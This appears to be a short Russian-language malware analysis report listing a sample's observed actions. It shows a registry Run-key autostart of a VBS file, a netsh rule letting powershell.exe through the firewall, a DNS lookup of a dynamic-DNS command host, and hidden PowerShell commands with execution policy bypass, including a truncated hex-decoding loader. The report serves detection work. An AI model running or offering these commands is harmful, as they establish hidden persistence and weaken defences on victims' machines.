Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'FileName' = '<PATH_SAMPLE>.vbs'
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
- DNS ASK ch####.myq-see.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FileName' -value '<PATH_SAMPLE>.vbs' -PropertyType Stri...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]:...' (со скрытым окном)
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FileName' -value '<PATH_SAMPLE>.vbs' -PropertyType Stri...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]:...